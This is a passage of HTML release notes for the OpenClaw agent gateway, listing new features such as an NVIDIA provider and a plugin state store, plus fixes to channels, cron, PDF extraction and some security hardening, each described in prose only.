<li>Gateway/memory: add a read-only <code>doctor.memory.remHarness</code> RPC so operator clients can preview bounded REM dreaming output without running mutation paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263469272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66673/hovercard" href="https://github.com/openclaw/openclaw/pull/66673">#66673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Providers/NVIDIA: add the NVIDIA provider with API-key onboarding, setup docs, static catalog metadata, and literal model-ref picker support so NVIDIA hosted models can be selected with their provider prefix intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324848945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71204" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71204/hovercard" href="https://github.com/openclaw/openclaw/pull/71204">#71204</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Models: suppress explicitly configured openai-codex/gpt-5.4-mini inline entries so a stale models config written by <code>openclaw doctor --fix</code> cannot bypass the manifest capability block and cause repeated assistant-turn failures when the runtime switches to that model on ChatGPT-backed Codex accounts. Conditional suppressions (e.g. qwen Coding Plan endpoint guards) remain bypassable by explicit user configuration. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Added SQLite-backed plugin state store (<code>api.runtime.state.openKeyedStore</code>) for restart-safe keyed registries with TTL, eviction, and automatic plugin isolation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugin SDK: mark remaining legacy alias exports and diffs tool/config aliases with deprecation metadata, and add a guard so future legacy alias comments require <code>@deprecated</code> tags. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/QR/dependencies: internalize small terminal progress and QR wrapper helpers while keeping the real QR encoder dependency direct, reducing the default runtime dependency graph without changing QR output behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies: refresh workspace runtime, plugin, and tooling packages, including ACP, Pi, AWS SDK, TypeBox, pnpm, oxlint, oxfmt, jsdom, pdfjs, ciao, and tokenjuice, while keeping patched ACP behavior and lint gates current. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Gateway/dev: run <code>pnpm gateway:watch</code> through a named tmux session by default, with <code>gateway:watch:raw</code> and <code>OPENCLAW_GATEWAY_WATCH_TMUX=0</code> for foreground mode, so repeated starts respawn an inspectable watcher without trapping the invoking agent shell. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/diagnostics: emit an opt-in startup diagnostics timeline that records gateway lifecycle and plugin-load phases behind a config flag, so slow-start diagnosis no longer requires bespoke instrumentation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Control UI/i18n: extend the locale registry with new Persian (fa), Dutch (nl), Vietnamese (vi), Italian (it), Arabic (ar), and Thai (th) entries and ship <code>fa</code>, <code>nl</code>, <code>vi</code>, and <code>zh-TW</code> docs glossaries, so the docs translation pipeline and the Control UI language picker stay aligned across surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: add Yuanbao channel docs entrance so the Tencent Yuanbao bot appears in the channel listing and sidebar navigation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341969080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73443/hovercard" href="https://github.com/openclaw/openclaw/pull/73443">#73443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/Yuanbao: update plugin GitHub location to YuanbaoTeam/yuanbao-openclaw-plugin and add "yuanbao" alias to channel catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349371764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74253" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74253/hovercard" href="https://github.com/openclaw/openclaw/pull/74253">#74253</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Docker setup: add <code>OPENCLAW_SKIP_ONBOARDING</code> so automated Docker installs can skip the interactive onboarding step while still applying gateway defaults. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148855578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55518/hovercard" href="https://github.com/openclaw/openclaw/pull/55518">#55518</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>.</li>
<li>Security policy: classify media/base64 decode and format-conversion overhead after configured acceptance limits as performance-only for GHSA triage unless a report demonstrates a limit bypass, crash, exhaustion, data exposure, or another boundary bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350238747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74311/hovercard" href="https://github.com/openclaw/openclaw/pull/74311">#74311</a>)</li>
<li>Security/OpenGrep: add a precise OpenGrep rulepack, source-rule compiler, provenance metadata check, and PR/full scan workflows that validate first-party code and rulepack-only changes while uploading SARIF to GitHub Code Scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299142364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69483/hovercard" href="https://github.com/openclaw/openclaw/pull/69483">#69483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/civiltox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/civiltox">@civiltox</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solosage1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solosage1">@solosage1</a>.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KoykL/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KoykL">@KoykL</a>.</li>
<li>Infra/tmp: tolerate concurrent temp-dir permission repairs by rechecking directories that another process already tightened, so parallel ACP subprocess startup no longer throws <code>Unsafe fallback OpenClaw temp dir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265270151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66867" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66867/hovercard" href="https://github.com/openclaw/openclaw/issues/66867">#66867</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kane808-AI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kane808-AI">@Kane808-AI</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvisz8/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvisz8">@jarvisz8</a>.</li>
<li>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrewhong-translucent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrewhong-translucent">@andrewhong-translucent</a>.</li>
<li>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinduwang1001-max/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinduwang1001-max">@jinduwang1001-max</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juan-flores077/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juan-flores077">@juan-flores077</a>.</li>
<li>Signal: derive <code>getAttachment</code> HTTP response caps from <code>channels.signal.mediaMaxMb</code> with base64 headroom, so inbound photos and videos no longer drop behind the 1 MiB RPC default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343275028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73564" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73564/hovercard" href="https://github.com/openclaw/openclaw/issues/73564">#73564</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heyhudson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heyhudson">@heyhudson</a>.</li>
<li>Signal: keep the long-lived receive SSE monitor open while idle instead of applying the 10s RPC/check deadline, so <code>signal-cli</code> 0.14.3 event streams no longer reconnect before inbound messages arrive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354790687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74741/hovercard" href="https://github.com/openclaw/openclaw/issues/74741">#74741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fgabelmannjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fgabelmannjr">@fgabelmannjr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/k7n4n5t3w4rt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/k7n4n5t3w4rt">@k7n4n5t3w4rt</a>.</li>
<li>Models/OpenAI Codex: restore <code>openai-codex/gpt-5.4-mini</code> for ChatGPT/Codex OAuth PI runs after live OAuth proof, and align the manifest, forward-compat metadata, docs, and regression tests so stale cron and heartbeat configs resolve again. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LLagoon3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LLagoon3">@LLagoon3</a>.</li>
<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eurojojo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eurojojo">@eurojojo</a>.</li>
<li>Plugins/runtime-deps: always write a dependency map in generated runtime-deps install manifests, so npm does not crash or prune staged bundled-plugin packages when the plan is empty. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356326245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74949" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74949/hovercard" href="https://github.com/openclaw/openclaw/issues/74949">#74949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Security/outbound: strip re-formed HTML tags during plain-text sanitization so nested tag fragments cannot leave a CodeQL-detected <code>&lt;script&gt;</code> sequence behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/secrets: compare credential bytes with padded timing-safe buffers instead of hashing candidate passwords before equality checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/QQBot: sanitize debug log arguments before writing to <code>console.*</code>, so gateway payload fields cannot forge extra log lines when debug logging is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot: unify slash command auth and c2cOnly gating in the command registry, pass <code>allowQQBotDataDownloads</code> when sending slash command file attachments, align clear-storage with actual downloads directory, and add <code>/bot-me</code> to display sender user ID. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344118368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73616/hovercard" href="https://github.com/openclaw/openclaw/pull/73616">#73616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>CLI/agents/status: keep <code>openclaw agents</code>, text <code>agents list</code>, and plain text <code>status</code> on read-only metadata paths so human output no longer preloads plugin runtimes or live channel scans before printing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348784023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74195/hovercard" href="https://github.com/openclaw/openclaw/issues/74195">#74195</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/local models: derive context-window guard thresholds from the effective model window with 4k/8k safety floors, so small local models are no longer rejected by fixed 16k/32k preflight cutoffs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056859962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42999/hovercard" href="https://github.com/openclaw/openclaw/issues/42999">#42999</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chengjialu8888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chengjialu8888">@chengjialu8888</a>.</li>
<li>PDF extraction: resolve PDF.js standard fonts from the installed package root and pass a filesystem path to the Node fallback extractor, so built-in font PDFs render without <code>file://</code> URL lookup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111579816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51455/hovercard" href="https://github.com/openclaw/openclaw/issues/51455">#51455</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320477272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70936/hovercard" href="https://github.com/openclaw/openclaw/pull/70936">#70936</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134943079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54447/hovercard" href="https://github.com/openclaw/openclaw/pull/54447">#54447</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214513630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62175" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62175/hovercard" href="https://github.com/openclaw/openclaw/pull/62175">#62175</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JuanRdBO/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JuanRdBO">@JuanRdBO</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solomonneas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solomonneas">@solomonneas</a>.</li>
<li>Media: treat legacy Word/OLE attachments with <code>application/msword</code> or <code>application/x-cfb</code> MIME as binary so printable-looking <code>.doc</code> files are not embedded into prompts as text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131935972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54176/hovercard" href="https://github.com/openclaw/openclaw/issues/54176">#54176</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4133810089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54380" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54380/hovercard" href="https://github.com/openclaw/openclaw/pull/54380">#54380</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>Config: accept documented <code>browser.tabCleanup</code> keys in strict root config validation, so configured tab cleanup no longer fails before runtime reads it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353207232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74577" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74577/hovercard" href="https://github.com/openclaw/openclaw/issues/74577">#74577</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lonexreb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lonexreb">@lonexreb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ezdlp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ezdlp">@ezdlp</a>.</li>
<li>Cron: validate disabled job schedule edits before persisting updates, so invalid cron changes no longer partially mutate stored jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351895210" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74459" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74459/hovercard" href="https://github.com/openclaw/openclaw/issues/74459">#74459</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</li>
<li>CLI/cron: warn when <code>openclaw cron add --message</code> omits a nonblank <code>--agent</code>, including blank agent values and session-key jobs, so scheduled agent-turn jobs make default-agent fallback explicit while system events stay quiet. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051936623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42196/hovercard" href="https://github.com/openclaw/openclaw/issues/42196">#42196</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052315763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42245" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42245/hovercard" href="https://github.com/openclaw/openclaw/pull/42245">#42245</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a>.</li>
<li>CLI/progress: suppress nested progress spinners and line clears while TUI input owns raw stdin, so Crestodian <code>/status</code> no longer disturbs the active input row. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356940813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75003" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75003/hovercard" href="https://github.com/openclaw/openclaw/pull/75003">#75003</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/velvet-shark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/velvet-shark">@velvet-shark</a>.</li>
<li>Channels/status: keep Telegram, Slack, and Google Chat read-only allowlist/default-target accessors on config-only paths, so status and channel summaries do not resolve SecretRef-backed runtime credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eusine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eusine">@eusine</a>.</li>
<li>Telegram: use durable message edits for streaming previews instead of native draft state, so generated replies no longer flicker through draft-to-message transitions that look like duplicates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358015486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75073/hovercard" href="https://github.com/openclaw/openclaw/pull/75073">#75073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
